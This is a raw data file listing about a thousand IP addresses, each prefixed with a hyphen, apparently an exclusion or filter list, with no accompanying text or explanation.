-62.80.161.152 -134.119.219.182 -103.205.0.106 -104.217.58.44 -64.235.56.234 -118.190.27.31 -123.51.217.86 -176.28.115.186 -23.225.89.39 -139.196.28.62 -112.74.135.161 -212.109.216.143 -182.18.46.103 -194.24.241.146 -39.108.164.106 -123.207.30.221 -185.29.122.210 -23.225.89.9 -66.207.131.23 -112.65.214.29 -173.195.27.20 -59.151.12.183 -5.160.219.58 -77.252.152.84 -52.205.110.146 -122.53.180.51 -123.57.37.184 -23.237.64.126 -45.41.92.168 -77.223.131.189 -45.42.94.165 -176.221.75.119 -23.19.202.24 -172.255.159.215 -163.172.39.131 -82.94.226.147 -180.240.177.133 -104.203.82.44 -118.190.118.161 -59.110.1.202 -136.243.10.6 -45.61.113.18 -42.159.198.2 -104.237.132.220 -218.28.37.133 -52.77.246.100 -116.62.5.18 -34.202.56.73 -45.117.83.139 -103.74.121.162 -103.74.121.150 -164.132.148.102 -121.41.64.84 -185.37.145.211 -23.88.82.114 -125.45.173.28 -85.159.211.149 -218.17.88.130 -23.225.0.135 -60.191.89.186 -198.20.106.98 -178.209.97.151 -62.150.35.86 -45.32.80.230 -67.228.171.238 -121.42.235.98 -79.137.62.50 -120.55.160.108 -23.225.113.116 -222.77.182.254 -104.203.82.133 -113.96.132.122 -98.124.177.189 -107.187.41.251 -121.40.36.25 -23.225.89.29 -121.244.35.92 -140.109.240.75 -209.58.160.228 -207.20.231.30 -120.24.223.117 -35.197.129.33 -115.28.214.12 -112.78.10.83 -93.115.243.3 -31.220.18.146 -95.46.114.62 -185.124.84.174 -104.203.82.111 -142.91.95.58 -106.14.61.81 -45.114.94.190 -37.59.156.220 -109.235.252.146 -47.94.107.129 -185.165.204.6 -119.9.119.213 -185.140.12.200 -45.41.92.173 -118.89.38.35 -110.45.181.180 -103.205.0.121 -52.74.184.27 -120.25.63.66 -119.23.124.91 -139.196.49.211 -66.70.194.70 -23.225.0.97 -145.239.108.81 -164.132.80.117 -216.119.150.49 -136.0.69.159 -112.74.52.37 -86.104.177.120 -113.196.75.45 -111.47.198.13 -185.85.191.138 -222.242.193.100 -174.142.242.76 -112.74.161.236 -103.205.3.98 -182.92.218.218 -203.191.254.34 -54.36.43.224 -173.236.115.163 -217.23.4.89 -216.172.182.61 -173.236.115.105 -91.223.18.70 -88.209.250.5 -23.19.22.15 -167.114.108.156 -169.45.120.53 -41.77.115.203 -114.55.24.140 -193.70.68.30 -119.23.110.51 -5.153.22.93 -120.192.90.74 -103.100.157.19 -68.178.129.33 -193.70.110.100 -47.93.49.192 -50.22.82.122 -37.220.31.101 -106.245.88.88 -139.196.9.11 -103.235.238.79 -31.186.25.65 -118.193.204.147 -52.76.34.152 -198.23.88.80 -133.242.53.205 -162.213.252.176 -116.224.61.59 -23.19.238.16 -69.87.198.121 -54.238.126.143 -139.196.136.18 -45.125.50.114 -80.48.31.6 -77.92.144.17 -114.55.145.250 -162.242.208.45 -104.217.67.105 -104.237.133.68 -134.119.20.63 -115.29.166.161 -184.164.143.233 -54.37.178.172 -103.45.99.135 -162.214.10.52 -142.4.107.214 -99.192.219.69 -54.226.27.232 -121.200.60.19 -173.230.152.233 -50.23.255.236 -103.198.45.2 -23.225.239.158 -23.225.239.24 -121.40.203.2 -123.56.233.25 -67.19.21.140 -39.107.32.47 -50.97.234.137 -104.203.82.12 -61.52.115.1 -172.246.101.73 -94.124.1.34 -70.38.56.39 -185.174.30.141 -85.206.175.200 -185.30.92.210 -5.135.58.100 -104.232.102.130 -153.92.42.173 -81.201.140.14 -95.211.108.108 -77.233.0.77 -120.77.179.8 -62.210.116.20 -103.14.8.219 -120.27.12.4 -209.133.213.239 -117.191.88.214 -198.37.115.250 -125.89.66.84 -74.207.235.128 -61.182.226.251 -154.70.130.26 -192.121.176.175 -107.20.76.27 -173.225.189.23 -62.220.134.51 -139.196.89.52 -120.76.231.43 -198.1.101.139 -112.74.210.40 -158.69.62.201 -133.242.150.153 -119.28.186.70 -194.135.86.110 -34.244.192.131 -195.248.234.233 -161.202.10.148 -184.171.249.54 -172.106.186.48 -106.184.4.246 -118.190.2.4 -37.187.72.198 -104.232.75.151 -173.255.204.207 -107.155.81.129 -183.5.97.123 -42.159.25.151 -187.237.24.247 -123.56.135.207 -59.110.137.111 -188.132.135.57 -107.180.77.214 -54.147.246.246 -142.91.239.84 -193.254.187.133 -178.33.28.129 -142.91.243.85 -185.30.126.61 -54.37.216.237 -219.135.134.11 -117.27.152.7 -58.22.108.146 -114.215.138.151 -111.118.183.183 -37.58.96.74 -142.91.95.225 -54.202.212.67 -45.79.161.159 -112.124.126.79 -114.215.208.170 -211.149.234.147 -107.164.66.86 -120.26.205.177 -68.168.104.148 -178.32.130.93 -114.221.203.165 -116.62.19.76 -123.57.72.62 -45.64.98.12 -47.88.191.41 -115.146.121.231 -188.132.147.27 -122.114.36.79 -142.91.95.122 -188.165.164.222 -109.169.86.144 -45.35.99.145 -47.100.81.79 -115.159.118.166 -23.225.113.64 -91.206.30.17 -203.123.51.199 -5.196.117.176 -113.10.136.129 -139.162.9.60 -123.56.75.27 -103.230.120.227 -120.24.238.170 -178.79.157.40 -125.88.35.211 -84.255.244.203 -123.207.229.61 -66.254.190.202 -120.24.15.108 -119.29.150.23 -192.119.13.170 -103.28.38.89 -113.98.216.11 -209.188.8.181 -50.93.199.187 -103.100.157.26 -125.212.245.28 -46.105.84.192 -121.40.196.157 -119.61.68.3 -117.54.54.194 -47.88.100.219 -23.225.89.108 -45.248.68.119 -139.199.102.27 -192.184.62.57 -123.207.247.175 -37.187.138.81 -117.63.192.34 -114.215.42.163 -149.56.231.100 -181.214.55.33 -115.28.149.100 -185.83.147.165 -142.4.209.181 -42.121.129.164 -192.95.18.144 -23.110.61.84 -103.213.251.65 -101.200.189.160 -218.25.227.2 -124.118.4.93 -158.69.36.4 -23.238.166.170 -45.122.222.101 -183.181.24.15 -65.18.120.24 -23.225.0.78 -49.50.76.129 -54.155.112.157 -120.25.103.181 -23.19.237.23 -112.74.209.91 -80.85.87.243 -64.118.92.7 -120.25.152.94 -122.114.37.219 -61.160.251.18 -183.15.11.7 -190.221.147.74 -111.230.157.134 -182.18.42.176 -121.41.11.228 -178.33.192.60 -193.45.5.45 -51.255.30.117 -112.124.10.40 -120.76.73.39 -202.44.109.41 -123.59.197.73 -123.206.23.142 -123.56.188.67 -101.200.132.1 -112.74.86.68 -118.190.94.176 -114.115.149.163 -149.202.22.245 -139.199.155.144 -122.114.36.156 -104.238.136.246 -60.249.246.7 -139.162.60.201 -178.33.57.95 -61.154.14.236 -139.196.123.131 -23.244.241.140 -211.149.238.207 -158.69.149.30 -98.126.202.139 -162.214.22.59 -52.18.214.163 -172.246.101.152 -2600:3c00::f03c:91ff:fe73:2f32 -182.254.134.197 -14.102.147.82 -218.92.147.108 -193.151.107.241 -185.13.56.124 -113.17.170.74 -119.29.213.23 -23.229.227.169 -46.105.158.55 -117.28.112.222 -172.104.49.155 -120.25.164.173 -180.214.163.162 -103.44.61.24 -5.39.65.103 -198.1.66.40 -23.238.145.110 -112.124.7.236 -101.200.190.201 -144.168.71.131 -77.92.132.150 -45.76.141.99 -176.31.73.100 -112.121.165.66 -178.238.235.132 -46.38.48.253 -52.77.239.140 -218.108.69.13 -95.169.196.24 -103.205.0.76 -199.38.116.254 -144.48.125.131 -104.239.176.238 -158.69.149.28 -103.205.0.126 -166.62.74.201 -104.224.198.169 -202.6.17.155 -103.26.158.79 -218.32.216.251 -132.148.134.204 -90.84.246.57 -103.250.73.131 -64.120.123.144 -94.247.28.249 -192.165.37.195 -103.47.192.65 -123.206.31.94 -192.162.115.2 -23.104.135.163 -195.24.91.48 -119.23.63.69 -45.124.94.51 -115.29.199.218 -161.202.28.135 -45.76.145.60 -116.62.4.177 -200.162.163.8 -69.30.202.76 -219.128.243.229 -14.18.242.193 -120.76.209.107 -139.162.45.58 -172.104.100.94 -109.167.217.230 -108.170.59.194 -103.24.2.251 -45.32.13.74 -103.37.232.72 -198.100.159.86 -115.238.21.150 -59.110.49.190 -77.88.193.205 -5.189.130.40 -66.39.65.24 -162.213.254.36 -103.43.172.171 -23.19.202.4 -172.104.46.223 -61.54.1.56 -104.239.198.42 -23.238.176.202 -39.106.40.173 -121.42.28.130 -52.59.187.68 -47.75.56.22 -115.29.201.130 -23.238.176.232 -103.52.52.34 -104.224.200.242 -91.134.228.232 -115.126.37.135 -88.150.157.240 -193.124.4.87 -123.56.17.213 -199.182.173.15 -178.33.56.100 -92.222.13.27 -112.124.114.59 -37.187.166.233 -45.40.137.82 -122.225.65.254 -23.19.22.53 -121.41.90.222 -123.56.196.15 -213.136.92.65 -185.13.59.242 -166.63.21.80 -120.24.213.64 -123.56.243.26 -213.111.126.249 -139.196.172.203 -121.40.122.8 -221.206.20.253 -46.30.42.87 -123.56.71.2 -124.195.17.173 -103.14.8.241 -176.9.248.179 -5.196.108.130 -47.94.100.15 -184.154.52.82 -222.187.223.85 -109.254.247.88 -23.225.89.36 -45.70.56.75 -192.165.33.197 -207.203.96.4 -23.225.113.57 -61.152.188.250 -14.215.113.182 -46.105.104.154 -54.243.180.157 -1.119.129.188 -112.124.104.162 -2607:9000:0:35::c689:6de0 -23.88.82.119 -138.201.56.69 -114.55.27.239 -46.254.21.225 -104.224.202.171 -23.225.89.242 -23.110.56.74 -23.110.47.211 -65.60.22.25 -101.201.223.169 -61.247.187.74 -89.33.247.138 -120.76.189.8 -121.40.170.184 -172.246.101.45 -202.52.134.160 -52.23.237.27 -74.206.182.172 -120.26.105.84 -113.245.186.152 -112.78.10.124 -178.79.155.142 -46.105.81.231 -210.245.26.103 -223.71.238.104 -198.24.128.24 -133.242.195.158 -119.23.240.70 -120.52.139.72 -51.255.133.44 -58.247.252.30 -89.33.247.16 -94.249.14.86 -120.76.151.53 -202.66.172.133 -88.99.142.117 -208.69.118.167 -23.19.202.39 -192.154.97.3 -124.207.240.70 -109.73.168.206 -111.68.14.246 -103.55.25.10 -118.190.102.204 -45.35.102.145 -103.100.157.246 -104.238.79.192 -109.95.211.87 -46.166.180.16 -216.189.155.242 -192.99.69.232 -222.240.234.115 -51.254.148.204 -136.0.69.189 -112.91.169.226 -103.198.45.60 -103.208.32.251 -64.118.90.233 -95.47.182.163 -47.93.101.159 -166.63.21.87 -66.254.175.45 -89.32.227.181 -78.111.98.229 -144.76.167.246 -107.161.24.133 -185.13.58.33 -5.196.27.58 -5.135.176.222 -47.93.28.124 -45.79.190.217 -124.207.18.74 -209.123.65.103 -123.57.162.114 -188.225.33.94 -103.205.2.101 -49.156.55.13 -5.79.78.73 -54.247.75.169 -166.63.45.96 -158.255.211.187 -212.83.189.79 -120.85.134.118 -151.80.172.31 -120.76.163.200 -109.73.168.207 -188.227.228.4 -185.13.56.245 -115.236.177.212 -45.77.13.109 -46.32.228.92 -91.197.125.7 -123.56.186.244 -222.132.26.57 -104.232.75.160 -192.163.205.229 -103.224.251.215 -142.4.119.101 -42.123.124.142 -184.171.249.52 -142.91.95.207 -45.35.99.184 -185.38.45.111 -120.55.126.45 -172.107.147.14 -165.227.6.217 -153.122.22.207 -83.166.136.242 -104.217.62.3 -144.168.70.135 -190.11.16.219 -89.33.247.19 -23.225.0.168 -61.186.137.163 -119.23.34.63 -23.225.0.22 -37.59.81.76 -123.57.164.213 -162.243.252.248 -86.104.177.25 -104.251.217.161 -103.86.141.238 -172.106.186.17 -47.92.159.173 -189.50.145.12 -113.67.139.16 -114.55.90.134 -95.85.54.250 -54.37.190.41 -52.207.169.249 -93.180.64.152 -114.80.156.91 -184.173.138.242 -128.199.73.4 -23.104.135.102 -180.214.163.164 -119.40.35.244 -120.76.226.201 -103.205.3.69 -200.69.5.10 -172.107.73.247 -202.6.17.146 -23.244.241.97 -103.239.74.93 -121.40.249.24 -2405:200:1601:c400:10:130:21:23 -121.95.100.118 -119.28.14.123 -173.199.116.20 -37.139.31.178 -188.166.139.109 -23.225.89.102 -172.106.187.219 -74.208.67.126 -119.23.134.145 -23.88.82.253 -121.41.173.206 -176.31.249.213 -133.242.121.220 -142.4.107.93 -54.173.249.52 -114.215.31.50 -119.59.100.188 -67.207.81.59 -113.196.75.74 -202.179.184.40 -211.159.219.77 -139.162.49.155 -139.196.200.133 -27.0.12.184 -37.187.111.153 -213.158.170.3 -101.132.148.202 -159.253.33.197 -144.48.125.135 -202.6.17.150 -13.124.180.167 -192.155.252.115 -142.91.241.84 -119.29.56.13 -59.110.46.245 -54.249.200.79 -60.205.170.74 -149.56.36.49 -172.107.73.235 -95.85.1.120 -23.19.22.59 -121.43.235.197 -113.108.68.148 -85.9.56.211 -82.196.11.188 -204.186.82.20 -23.224.115.162 -23.225.89.28 -212.129.24.77 -23.111.68.130 -59.56.73.236 -95.46.198.113 -23.88.247.22 -212.121.225.20 -103.38.43.142 -107.170.100.96 -45.61.114.47 -113.196.233.186 -112.237.26.189 -159.89.194.74 -103.12.50.60 -120.79.200.215 -45.76.183.9 -13.231.139.69 -46.4.143.43 -104.250.143.195 -103.205.3.126 -66.254.184.138 -46.209.20.138 -60.205.182.225 -193.70.68.21 -61.147.116.88 -103.235.254.234 -59.56.18.170 -123.57.249.219 -23.224.115.187 -112.112.151.20 -207.58.147.98 -159.253.33.203 -155.94.205.173 -139.162.46.137 -107.178.150.82 -211.159.169.70 -158.69.57.82 -173.249.22.52 -23.225.239.126 -88.99.91.203 -114.55.105.86 -23.225.89.132 -45.252.250.236 -217.13.92.170 -23.225.113.158 -115.84.179.114 -209.126.96.100 -45.117.169.203 -185.174.31.205 -54.168.51.10 -116.228.70.138 -115.30.2.133 -111.230.166.138 -173.225.184.178 -92.222.104.186 -121.40.171.83 -116.62.120.127 -46.101.158.84 -14.139.173.70 -54.65.253.128 -178.251.24.100 -123.56.86.252 -23.104.135.245 -103.3.173.157 -47.90.32.27 -64.15.140.193 -120.77.62.253 -138.68.165.91 -212.224.112.98 -114.247.239.238 -37.59.213.64 -185.22.232.238 -43.225.53.209 -92.63.57.12 -104.203.82.114 -138.68.162.154 -78.31.166.26 -78.129.146.71 -138.201.132.196 -218.244.133.98 -158.69.181.153 -166.63.122.27 -23.225.0.246 -79.143.187.79 -120.26.79.195 -106.120.85.140 -51.15.64.64 -47.52.6.165 -62.210.78.79 -133.242.236.193 -116.255.215.73 -198.24.128.8 -185.174.31.213 -69.164.213.186 -210.211.117.53 -115.29.36.173 -62.213.100.26 -104.232.75.179 -101.132.190.24 -88.99.213.179 -45.250.176.32 -139.224.53.108 -59.110.171.21 -128.199.82.245 -185.72.246.149 -77.92.144.11 -159.203.19.162 -74.207.254.108 -192.33.132.184 -211.155.230.211 -116.62.34.217 -66.117.11.150 -185.13.58.110 -118.89.113.141 -46.105.115.11 -196.15.196.92 -109.201.149.184 -70.36.125.43 -79.143.178.7 -213.136.67.173 -83.149.89.43 -45.61.112.12 -178.22.67.22 -106.75.14.38 -74.208.197.174 -107.178.147.96 -35.164.11.211 -182.92.171.178 -219.90.122.21 -108.178.29.133 -64.71.145.115 -192.99.147.26 -139.196.105.41 -23.19.22.10 -124.160.127.170 -139.196.240.141 -27.255.77.114 -217.218.249.21 -103.205.3.67 -125.212.220.186 -142.91.243.77 -23.88.82.249 -103.28.39.139 -188.226.170.120 -185.63.191.152 -106.14.192.176 -45.61.113.2 -104.217.54.19 -210.37.0.63 -201.249.74.43 -98.129.37.130 -172.246.101.223 -172.104.5.138 -123.207.31.146 -191.101.150.114 -173.0.63.179 -54.166.89.18 -23.225.239.238 -60.223.247.236 -107.178.150.118 -85.206.175.196 -185.174.28.17 -120.76.210.172 -45.32.31.191 -117.41.180.169 -128.199.250.20 -164.132.204.124 -142.91.95.42 -27.111.36.152 -61.142.9.151 -112.117.223.44 -184.173.102.60 -72.249.76.53 -218.32.216.188 -85.214.113.99 -192.165.228.24 -182.92.5.170 -183.232.70.25 -139.5.200.195 -107.187.41.14 -65.60.5.95 -112.82.144.157 -47.94.159.150 -193.70.97.226 -89.43.65.28 -54.226.175.79 -164.52.150.251 -61.177.52.230 -107.170.204.170 -221.146.23.215 -185.106.23.10 -45.114.94.201 -144.48.223.122 -46.105.172.249 -69.65.56.183 -184.107.223.4 -212.96.127.230 -23.225.239.223 -120.77.182.32 -173.236.115.129 -213.157.169.138 -172.107.146.166 -185.13.58.137 -101.200.123.172 -31.220.54.83 -115.29.238.93 -159.65.84.33 -123.56.182.129 -205.186.128.9 -87.98.142.238 -172.246.101.128 -114.242.108.19 -23.225.0.29 -186.177.79.235 -107.178.147.92 -182.92.102.20 -178.32.159.67 -23.253.229.123 -85.214.135.35 -172.255.159.201 -195.62.178.68 -112.84.184.207 -212.118.226.210 -178.32.77.115 -45.32.223.130 -205.185.124.250 -114.215.200.206 -119.113.112.60 -46.36.38.42 -46.228.205.253 -172.107.146.162 -54.160.222.221 -146.185.157.239 -101.132.153.195 -78.155.203.251 -80.21.31.34 -172.106.187.244 -67.228.3.236 -195.246.223.13 -68.67.62.158 -39.108.226.202 -172.104.155.41 -198.23.88.81 -161.202.28.154 -121.42.246.236 -54.37.56.231 -118.27.30.184 -91.231.144.228 -35.187.252.82 -66.39.134.11 -221.13.74.88 -157.7.161.168 -96.126.108.37 -104.130.75.151 -185.187.161.171 -166.63.21.78 -47.91.131.155 -46.182.29.4 -162.243.60.6 -172.107.147.34 -89.191.21.164 -158.69.214.143 -58.42.213.69 -2a01:7e01::f03c:91ff:fe1f:56be -211.233.47.34 -109.169.86.91 -139.196.44.242 -107.187.41.154 -82.135.151.186 -222.188.109.112 -23.227.133.37 -69.65.50.69 -172.246.101.22 -185.13.58.243 -107.178.162.77 -114.67.79.68 -52.213.102.203 -50.97.230.61 -162.243.62.59 -208.43.251.244 -103.12.51.49 -23.104.135.17 -139.196.127.243 -203.66.57.45 -120.77.81.70 -23.239.31.203 -119.29.36.96 -5.101.107.87 -186.177.79.237 -183.207.174.105 -66.228.47.219 -185.174.29.189 -45.55.42.117 -86.104.177.54 -142.4.103.82 -142.4.201.37 -103.43.18.15 -128.199.167.211 -103.246.17.211 -103.231.188.85 -106.186.124.163 -149.56.36.188 -54.179.231.254 -118.89.28.158 -23.88.82.74 -112.74.79.174 -23.225.0.84 -107.187.41.170 -184.95.53.26 -107.164.66.236 -107.164.66.192 -121.43.185.162 -181.174.184.44 -80.92.90.242 -38.27.96.203 -47.96.10.127 -192.99.78.8 -61.233.206.11 -153.125.234.22 -162.220.8.232 -103.205.0.115 -122.114.176.148 -108.59.251.205 -23.104.135.118 -119.29.28.166 -45.77.21.62 -139.162.38.134 -172.104.63.184 -89.33.247.30 -66.39.141.162 -192.36.197.128 -111.125.139.134 -77.222.71.5 -202.152.22.202 -172.246.101.102 -174.37.242.34 -188.165.141.28 -159.89.43.163 -188.166.221.150 -139.59.140.173 -200.111.110.171 -37.58.96.76 -128.1.165.220 -115.159.84.100 -142.4.103.108 -51.15.174.120 -111.231.90.236 -61.152.188.80 -123.57.33.68 -46.97.18.186 -54.172.137.160 -104.236.219.216 -151.80.172.6 -198.27.78.135 -50.97.214.91 -107.23.213.9 -95.213.174.250 -82.146.53.141 -69.16.228.170 -64.235.56.233 -132.148.1.151 -1.196.7.111 -5.196.209.169 -212.109.223.192 -54.183.130.138 -163.172.152.87 -188.165.164.229 -24.62.1.77 -208.68.90.183 -188.166.95.213 -158.140.181.108 -149.56.241.54 -89.185.229.94 -67.209.122.15 -123.57.209.164 -185.213.208.30 -54.36.175.131 -104.217.62.5 -167.114.91.61 -107.170.199.222 -172.104.224.237 -120.37.168.65 -103.193.173.172 -180.76.158.21 -103.12.51.18 -149.56.122.66 -65.60.59.119 -172.107.146.164 -120.24.6.121 -68.235.60.100 -42.121.52.247 -194.105.220.4 -94.23.26.16 -153.122.32.24 -172.104.34.12 -39.108.168.109 -45.55.73.110 -45.79.178.223 -139.162.51.32 -188.95.48.58 -218.18.96.146 -52.74.86.69 -123.150.146.19 -99.192.227.110 -23.244.241.6 -151.80.42.218 -139.224.221.156 -218.91.205.44 -46.105.237.221 -47.104.181.242 -45.114.94.165 -1.22.124.222 -192.99.190.175 -13.73.164.233 -70.60.188.243 -5.135.221.132 -139.196.6.127 -62.210.99.96 -116.228.79.11 -47.93.1.18 -95.173.178.181 -158.69.254.22 -162.243.115.188 -202.6.17.138 -85.206.175.198 -89.19.22.222 -121.40.101.251 -128.199.71.78 -106.3.37.119 -139.162.38.104 -104.149.201.51 -111.93.233.252 -5.45.70.177 -178.79.131.101 -5.135.224.38 -31.220.19.41 -144.168.73.133 -107.180.85.27 -42.114.104.37 -23.229.227.170 -47.94.150.147 -149.56.151.153 -144.168.73.130 -107.182.233.103 -198.58.80.78 -204.93.169.109 -121.40.80.101 -45.252.251.106 -183.131.54.120 -183.230.11.116 -23.225.239.66 -83.142.189.98 -5.189.130.219 -82.135.151.234 -202.126.120.252 -107.178.162.87 -202.129.190.102 -178.208.79.185 -5.160.219.59 -144.168.70.142 -114.80.100.66 -94.23.176.87 -34.199.175.15 -138.68.87.9 -185.177.44.52 -192.155.88.11 -174.142.242.79 -137.74.199.84 -45.32.91.119 -185.13.59.237 -173.212.203.208 -104.232.102.140 -52.27.215.22 -194.28.167.246 -87.98.154.216 -172.107.64.61 -200.152.183.137 -180.116.103.12 -218.32.216.166 -51.255.88.51 -210.245.81.86 -67.225.201.132 -104.238.124.8 -173.208.166.227 -216.158.235.8 -45.61.115.17 -52.68.8.49 -118.244.236.142 -134.119.11.60 -23.111.164.84 -120.24.233.6 -89.38.132.162 -169.38.76.177 -162.243.142.75 -107.22.167.192 -162.144.207.92 -119.23.17.71 -52.207.234.223 -96.126.117.194 -119.42.149.227 -119.29.98.178 -39.110.232.170 -104.217.62.50 -202.125.94.88 -115.126.14.241 -66.254.189.88 -104.232.102.165 -13.115.61.22 -52.90.173.109 -89.33.247.2 -103.205.0.109 -88.150.157.167 -5.135.58.74 -213.108.108.130 -37.153.89.197 -38.98.128.163 -5.45.77.104 -142.4.119.84 -173.249.33.244 -124.167.254.146 -200.98.142.103 -164.138.217.134 -45.32.71.67 -114.255.138.178 -216.104.35.73 -23.244.241.115 -172.246.101.29 -85.254.126.105 -120.77.81.68 -103.53.198.201 -209.95.39.210 -121.41.78.63 -158.69.51.11 -211.149.181.81 -104.217.54.14 -142.4.119.107 -118.190.62.243 -185.13.59.94 -115.159.216.245 -184.173.138.227 -119.23.36.135 -61.80.90.76 -52.25.181.102 -149.56.189.255 -91.121.67.40 -89.200.142.224 -198.58.80.116 -188.165.209.38 -54.172.124.86 -78.129.237.48 -72.9.152.134 -104.232.102.168 -123.54.195.152 -74.221.216.76 -5.45.77.128 -198.50.138.241 -87.98.241.129 -128.199.87.52 -23.225.0.128 -183.182.44.155 -195.8.206.134 -114.242.105.137 -198.11.212.253 -172.106.186.45 -185.4.227.123 -119.23.134.123 -185.13.58.69 -112.74.161.157 -103.27.239.215 -101.201.48.75 -104.129.16.138 -167.114.237.232 -23.88.82.148 -188.132.147.77 -124.232.137.30 -112.26.143.211 -220.110.147.210 -103.239.28.7 -142.91.95.37 -5.200.23.51 -172.107.73.206 -188.132.219.171 -159.203.88.9 -82.135.151.129 -159.148.13.142 -194.24.228.36 -103.230.120.228 -62.109.28.237 -118.123.21.117 -86.127.82.113 -64.118.90.213 -52.196.249.235 -212.68.42.9 -111.207.139.170 -198.200.41.80 -121.40.120.90 -103.79.117.75 -162.217.113.158 -134.119.236.59 -184.169.179.53 -121.40.193.72 -185.13.59.13 -203.195.199.27 -184.105.156.2 -172.246.101.195 -189.90.55.12 -192.169.245.182 -38.135.32.37 -101.201.101.210 -78.24.217.134 -62.63.191.25 -139.196.41.6 -195.154.164.18 -103.12.51.57 -95.85.12.134 -121.196.232.249 -122.9.163.245 -52.211.56.64 -188.226.150.63 -142.4.103.76 -45.56.99.191 -198.27.123.224 -222.122.197.15 -209.58.180.240 -85.254.126.38 -82.135.151.7 -101.200.182.195 -120.25.125.75 -43.230.203.173 -62.210.151.235 -72.167.119.103 -185.174.28.137 -23.225.239.101 -185.83.147.151 -62.210.140.47 -146.185.191.107 -38.27.100.200 -209.59.162.21 -173.208.153.90 -118.144.162.24 -54.36.123.189 -23.224.115.83 -27.126.179.36 -43.255.242.213 -202.43.178.33 -183.149.246.144 -209.236.114.127 -107.180.85.152 -39.106.31.53 -139.99.131.17 -5.135.68.204 -112.74.63.210 -37.187.140.97 -138.68.246.77 -107.161.24.44 -180.235.148.148 -103.100.157.239 -96.44.167.100 -47.89.55.123 -45.61.115.38 -122.114.176.232 -187.87.153.82 -163.118.215.204 -185.37.226.95 -104.238.118.153 -184.173.138.237 -107.165.201.44 -156.237.176.222 -151.80.172.25 -192.122.200.194 -54.37.190.38 -121.199.79.117 -144.168.74.141 -213.189.63.21 -159.148.13.136 -184.173.138.251 -166.63.21.25 -133.130.69.188 -101.201.67.67 -23.104.135.87 -23.19.202.35 -185.174.30.209 -5.135.59.31 -92.55.146.88 -136.0.69.219 -172.246.101.143 -172.106.186.22 -5.79.69.37 -184.173.138.246 -23.225.239.54 -203.121.4.75 -220.73.173.116 -120.27.26.186 -223.203.130.205 -222.255.175.207 -81.171.34.42 -194.69.207.136 -185.174.30.159 -193.70.97.176 -103.30.5.17 -185.205.61.25 -158.69.99.23 -103.100.157.12 -62.109.17.164 -81.20.136.178 -107.6.221.118 -119.29.150.62 -199.203.206.103 -37.187.253.136 -159.89.201.41 -172.82.180.155 -124.207.213.217 -137.74.132.89 -107.164.66.253 -211.140.151.220 -185.136.205.65 -107.178.147.82 -91.121.226.230 -2a01:238:42f7:5f00:ea9b:1b8:9ae7:7182 -159.253.33.195 -23.225.89.155 -52.88.148.23 -54.37.170.64 -121.43.120.178 -172.246.101.28 -92.240.68.228 -120.26.6.219 -184.173.138.254 -192.41.229.14 -167.114.51.81 -120.24.156.75 -23.110.47.212 -188.166.245.34 -163.172.51.252 -13.115.112.239 -103.12.49.15 -207.154.218.82 -5.153.22.86 -39.108.165.110 -107.187.41.34 -103.205.2.94 -184.173.138.243 -77.223.141.121 -195.242.9.33 -159.89.23.60 -23.225.239.33 -23.225.239.33 -23.110.47.246 -128.199.98.34 -23.225.0.65 -173.193.168.50 -42.112.38.16 -112.74.130.128 -125.253.127.138 -200.117.153.56 -95.172.255.11 -193.230.189.5 -137.74.201.47 -103.74.121.166 -121.42.225.31 -81.171.34.68 -175.22.110.120 -27.254.67.57 -58.82.170.45 -23.225.0.32 -192.99.170.6 -138.68.236.111 -213.168.163.66 -101.200.165.174 -120.27.244.1 -198.11.212.228 -47.90.47.154 -132.247.234.26 -198.199.121.234 -172.246.101.162 -185.191.229.4 -171.244.8.31 -34.205.159.61 -58.137.102.102 -198.58.124.129 -13.115.2.129 -139.59.107.8 -158.69.161.49 -114.215.106.43 -81.171.34.39 -103.248.253.15 -203.123.51.197 -54.225.254.164 -139.162.21.164 -203.77.224.220 -91.250.94.26 -109.169.86.241 -81.171.34.69 -198.11.182.113 -222.77.182.253 -120.26.225.216 -23.104.135.34 -23.225.218.130 -115.28.145.78 -23.225.89.60 -108.168.174.117 -51.254.5.210 -5.135.58.65 -159.89.83.132 -175.168.36.253 -212.118.233.103 -45.114.94.89 -66.51.12.26 -154.66.112.5 -182.16.121.67 -65.60.46.149 -136.0.69.247 -71.6.179.253 -183.60.107.242 -91.121.220.188 -82.135.148.128 -162.221.187.3 -109.206.168.136 -23.110.47.207 -39.107.116.203 -46.254.17.219 -112.74.184.12 -62.63.190.51 -5.189.170.236 -142.4.107.236 -13.112.142.177 -87.252.5.53 -128.250.234.73 -151.80.65.233 -111.68.15.45 -181.57.160.165 -23.238.18.209 -182.16.25.149 -180.97.70.62 -60.205.4.89 -195.88.63.36 -80.68.90.146 -87.239.152.137 -198.50.199.243 -62.210.25.146 -121.42.25.46 -108.168.174.104 -119.81.107.166 -119.81.5.127 -139.199.80.231 -23.110.61.97 -163.44.206.160 -185.185.233.69 -221.219.135.117 -103.56.158.61 -50.116.49.37 -111.9.116.141 -103.230.120.248 -213.158.170.11 -104.232.75.156 -65.60.61.159 -142.4.113.206 -52.220.149.101 -61.164.108.175 -132.148.9.241 -158.69.209.245 -182.92.235.76 -5.160.219.10 -23.19.238.24 -185.43.220.235 -173.0.63.162 -110.81.155.226 -120.24.254.15 -23.110.61.115 -95.130.12.189 -178.62.245.232 -133.130.74.164 -101.64.237.50 -23.19.238.23 -64.118.87.199 -86.104.177.8 -156.235.172.67 -158.69.207.105 -162.218.53.244 -43.254.229.26 -103.192.226.140 -221.237.199.187 -104.131.53.31 -47.91.44.114 -139.162.63.199 -212.71.237.6 -31.3.225.12 -194.49.77.133 -120.25.210.120 -82.135.148.85 -104.224.202.164 -54.201.182.105 -112.4.82.120 -104.238.111.41 -182.16.57.78 -212.28.240.94 -202.56.203.44 -23.224.115.158 -212.129.53.26 -103.220.30.92 -218.32.216.83 -103.205.2.103 -23.225.113.31 -45.76.186.108 -198.13.37.53 -115.28.183.64 -210.21.63.125 -94.130.41.188 -142.91.232.124 -198.200.41.85 -120.25.236.81 -23.225.0.43 -103.230.120.232 -49.51.34.207 -120.25.71.110 -94.53.242.225 -103.253.125.101 -155.94.205.172 -121.40.216.253 -103.205.2.122 -5.135.58.98 -119.29.247.40 -212.129.32.213 -85.254.126.48 -142.44.226.194 -109.169.76.39 -185.174.30.153 -52.39.252.222 -103.229.192.27 -103.23.79.184 -204.44.66.16 -91.237.108.38 -123.57.223.184 -120.77.252.92 -123.57.224.91 -123.57.53.249 -95.211.10.247 -103.100.157.255 -104.224.198.171 -178.32.146.5 -120.24.167.207 -80.77.95.18 -38.83.104.242 -136.0.69.43 -122.9.29.237 -66.70.204.127 -172.106.186.32 -121.42.151.103 -162.252.85.83 -115.159.74.113 -159.148.13.138 -128.199.223.144 